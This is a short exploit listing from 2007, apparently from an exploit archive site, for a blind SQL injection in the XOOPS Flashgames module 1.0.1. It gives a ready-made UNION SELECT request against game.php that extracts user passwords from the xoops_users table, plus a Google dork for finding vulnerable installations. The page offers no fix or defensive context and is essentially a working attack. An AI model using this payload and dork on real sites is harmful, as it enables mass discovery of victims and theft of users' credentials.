XOOPS Flashgames Module 1.0.1 Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : XOOPS Flashgames Module 1.0.1 Remote SQL Injection Vulnerability
# Published : 2007-05-04
# Author : xoron
# Previous Title : workbench 0.11 (header.php path) Remote File Inclusion Vulnerability
# Next Title : RunCms <= 1.5.2 (debug_show.php) Remote SQL Injection Exploit

================================================================

Xoops Flashgames Module  1.0.1 Remote Blind SQL Injection

================================================================

Bulan: Cyber-security.org

================================================================

Exploit:
/modules/flashgames/game.php?lid=-19/**/UNION/**/SELECT/**/0,1,pass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/**/FROM/**/xoops_users/**/LIMIT/**/1,1/*

================================================================

Google dork: inurl:modules/flashgames/

================================================================

# www.Syue.com [2007-05-04]